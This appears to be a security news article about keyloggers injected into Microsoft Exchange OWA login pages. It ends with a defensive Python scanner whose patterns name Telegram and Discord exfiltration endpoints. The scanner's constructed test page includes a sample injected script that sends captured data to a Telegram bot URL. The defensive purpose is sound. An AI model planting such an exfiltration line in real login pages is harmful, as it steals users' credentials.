Unknown threat actors have compromised internet-accessible Microsoft Exchange Servers of government organizations and companies around the world, and have injected the organizations’ Outlook on the Web (OWA) login page with browser-based keyloggers, Positive Technologies researchers have warned.
The keylogging JavaScript code (Source: Positive Technologies)
The initial vector for compromise is unknown
The researchers haven’t been able to pinpoint how the attackers gained access to the compromised servers.
Some of them were vulnerable to a slew of older vulnerabilities – including ProxyLogon (CVE-2021-26855), the three ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and SMBGhost (CVE-2020-0796) – but others weren’t affected by publicly known vulnerabilities, so the attackers may have used other methods to compromise them.
What the researchers were able to establish is that the login pages have been compromised with either:
- A JavaScript keylogger that grabs the login credentials (and occasionally user cookies) from the authentication form and essentially writes the data to a file on the compromised server that is accessible from the internet, or
- A JavaScript keylogger that exfiltrates the data to a Telegram bot or Discord server, and tags it so that the attackers know which organization the stolen credentials belong to.
Damage control
Servers affected by these attackers have been found in Vietnam, Russia, Taiwan, China, Australia, and other countries in Asia, Europe, Africa, and the Middle East.
“The majority of compromised servers were found in government organizations (22 servers belonging to government entities), as well as in the IT, industrial, and logistics companies,” the researchers noted.

Number of victims in different countries (Source: Positive Technologies)
The malicious JavaScript code is imperceptible to those who use the OWA login page to access their email, calendar, etc. via a browser.
But organizations can and should check all login pages and files related to user authentication for potentially malicious code, and check the MS Exchange Server folder for web shells and suspicious pages. (To that end, the researchers have shared a helpful YARA rule.)
Needless to say, if they discover that they have been compromised, organizations should mount an in-depth investigation to pinpoint whether attackers have found their way into other systems and networks, and reset the login credentials of all users who access their account via the compromised page.
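As an added illustration of the login-page check recommended above (example code written for this article, not Positive Technologies' YARA rule or tooling): a small Python scanner that flags scripts in an OWA logon page that reference the Telegram or Discord exfiltration endpoints, are loaded from an outside host, or combine reads of the credential fields with an outbound call. The sample pages are constructed, and the logon file location (`FrontEnd\HttpProxy\owa\auth\logon.aspx` under the Exchange install directory) is assumed from a standard install.

```python
import re
import sys

# Exfiltration endpoints named in the report (Telegram bot API, Discord webhooks).
EXFIL_HOSTS = ("api.telegram.org", "discord.com/api/webhooks", "discordapp.com/api/webhooks")
# Reads of the logon form's credential fields, and ways a script can send data out.
FIELD_ACCESS = re.compile(r"(username|password|document\.forms|getElementById\([^)]*\)\.value)", re.I)
NETWORK_CALL = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\()", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)

def scan_logon_page(html: str) -> list:
    """Return (script_index, reason, detail) for every script that needs a manual look."""
    findings = []
    for n, m in enumerate(SCRIPT_BLOCK.finditer(html), 1):
        attrs, body = m.group(1), m.group(2)
        src = re.search(r"""src\s*=\s*["']([^"']+)""", attrs, re.I)
        if src and src.group(1).startswith(("http://", "https://", "//")):
            # A stock OWA page loads its scripts from the Exchange server itself.
            findings.append((n, "external-script", src.group(1)))
            continue
        hosts = [h for h in EXFIL_HOSTS if h in body.lower()]
        if hosts:
            findings.append((n, "known-exfil-endpoint", ", ".join(hosts)))
        elif FIELD_ACCESS.search(body) and NETWORK_CALL.search(body):
            # Heuristic: a credential-field read combined with an outbound call.
            findings.append((n, "credential-read-plus-network", body.strip()[:80]))
    return findings

# Constructed stand-ins for a stock logon page and one with an injected script.
CLEAN_PAGE = """<html><body><form name="logonForm">
<input id="username"><input id="password">
<script type="text/javascript">function clkLgn(){document.logonForm.submit();}</script>
</form></body></html>"""
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>fetch("https://api.telegram.org/bot<TOKEN>/sendMessage?text=" + x)</script></body>')

if __name__ == "__main__":
    # Usage: python scan_owa.py <path to logon.aspx> ...; every finding is a review candidate.
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as f:
            for finding in scan_logon_page(f.read()):
                print(path, *finding)
```

Pattern matches are review candidates, not verdicts: compare any flagged script against a known-good copy of the page from the same Exchange build before acting on it.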
